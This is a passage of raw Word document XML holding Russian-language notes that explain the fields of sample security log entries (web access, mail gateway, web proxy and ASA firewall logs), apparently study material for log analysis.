          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-14701657/?</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">=551010000" – с кем устанавливается запрос </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FBD1C2" w14:textId="241F4E1A" w:rsidR="00EA0F9D" w:rsidRPr="00A04197" w:rsidRDefault="00EA0F9D" w:rsidP="00EA0F9D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A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/5.0 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9; </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Redmi</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Build</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>PKQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">1.180904.001; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>wv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/537.36 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>KHTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>like</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Gecko</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Version</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">/4.0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">/78.0.3904.96 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Mobile</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Safari</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/537.36</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>"  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> пользователь с какого устройства и откуда </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0105544C" w14:textId="34227934" w:rsidR="006F14DE" w:rsidRPr="00A04197" w:rsidRDefault="00EA0F9D" w:rsidP="00EA0F9D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A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>0.009 0.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">008 </w:t>
      </w:r>
      <w:r w:rsidR="006F14DE" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006F14DE" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> не знаю </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E06D4B" w14:textId="55C00616" w:rsidR="00EA0F9D" w:rsidRPr="00A04197" w:rsidRDefault="00EA0F9D" w:rsidP="00EA0F9D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A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>10.2.3.4:9001</w:t>
      </w:r>
      <w:r w:rsidR="006F14DE" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006F14DE" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>адерес</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F14DE" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> сервера </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B64CDD" w14:textId="77777777" w:rsidR="006F14DE" w:rsidRPr="00A04197" w:rsidRDefault="006F14DE" w:rsidP="00EA0F9D">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BA25529" w14:textId="66AF9013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  <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">#2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Mail</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78372847" w14:textId="77777777" w:rsidR="006F14DE" w:rsidRPr="00A04197" w:rsidRDefault="006F14DE" w:rsidP="006F14DE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="679B3559" w14:textId="565495E3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A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;22&gt; - уровень </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Dec</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 04 12:22:00 – дата время </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Mail</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>: - тип</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA9CA3A" w14:textId="781FC2E1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 Info: New SMTP ICID 11444342 interface MAIL (172.1.2.3) address 62.141.46.147 reverse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> host s2.kipersam.art verified yes – </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>информация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с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адресом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и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хостом</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7584310A" w14:textId="77777777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</w:p>
    <w:p w14:paraId="6414550D" w14:textId="7B0FAE88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</w:p>
    <w:p w14:paraId="1CC2D688" w14:textId="77777777" w:rsidR="006F14DE" w:rsidRPr="00A04197" w:rsidRDefault="006F14DE" w:rsidP="006F14DE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>#3 Proxy Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0003995C" w14:textId="34DEDCBE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&lt;30&gt; - </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>уровень</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A33BC6C" w14:textId="3DCDF3CC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A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Dec  4</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 12:21:59 – </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>дата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и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время</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F28B0EF" w14:textId="325B5041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mwg-prx1 – </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>имя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девайса</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>mwg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46181E1D" w14:textId="77777777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>LEEF:1.0|PRXName|WebGateway|7.8.2.11.0|0|devTime=1575440519000|src=10.7.8.9|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028071DA" w14:textId="77777777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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>usrName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">=petrov_123 = </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>имя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пользователя</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6C42AE" w14:textId="01BC8C3A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>|</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>userAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">=Mozilla/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36 – </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>пользователь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с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какого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устройства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и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откуда</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247B1D25" w14:textId="77777777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>|</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>httpStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">=200 = </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>успешно</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B79EC2" w14:textId="77777777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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">=149.154.167.99 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>дестинейшн</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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адрес</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559D760D" w14:textId="6D782030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>|</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>urlCategories</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">=Instant Messaging = </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>категория</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03313C25" w14:textId="3DDF9D47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>|</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>blockReason</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">=| </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>причина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блокировки</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ACE024" w14:textId="25993FCC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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=https://venus.web.telegram.org/apiw1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A79D4E" w14:textId="3A9D6A38" w:rsidR="006F14DE" w:rsidRPr="00A04197" w:rsidRDefault="006F14DE" w:rsidP="006F14DE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4400B23F" w14:textId="69C2F4CC" w:rsidR="006F14DE" w:rsidRPr="00A04197" w:rsidRDefault="006F14DE" w:rsidP="006F14DE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A97E062" w14:textId="77777777" w:rsidR="006F14DE" w:rsidRPr="00A04197" w:rsidRDefault="006F14DE" w:rsidP="006F14DE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>#3 ASA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AE851B" w14:textId="77777777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>&lt;166&gt; -</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>уровень</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D6E983" w14:textId="77777777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Dec 04 2019 12:21:59 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3141B90B" w14:textId="3376B1EC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ASA1234 – </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>хост</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F87D32F" w14:textId="0D9D121D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Deny TCP (no connection) from 90.143.47.21/42968 to 194.187.247.147/443 flags </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ACK  on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface outside - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Запретить</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>нет</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>соединения</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">) с 90.143.47.21/42968 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>по</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 194.187.247.147/443 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>флаги</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> ACK </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>на</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>внешнем</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>интерфейсе</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DCCAC90" w14:textId="1004FBD6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</w:p>
    <w:p w14:paraId="24686749" w14:textId="77777777" w:rsidR="006F14DE" w:rsidRPr="00A04197" w:rsidRDefault="006F14DE" w:rsidP="006F14DE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>#4 Mail Log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E45D16E" w14:textId="77777777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A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;22&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> - уровень </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400AF313" w14:textId="77777777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>Dec 04 12:22:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433F6FA3" w14:textId="3E68961E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A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Mail_Logs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – тип </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8D13B0" w14:textId="77777777" w:rsidR="00BA14AC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Info: ICID 11444342 </w:t>
      </w:r>
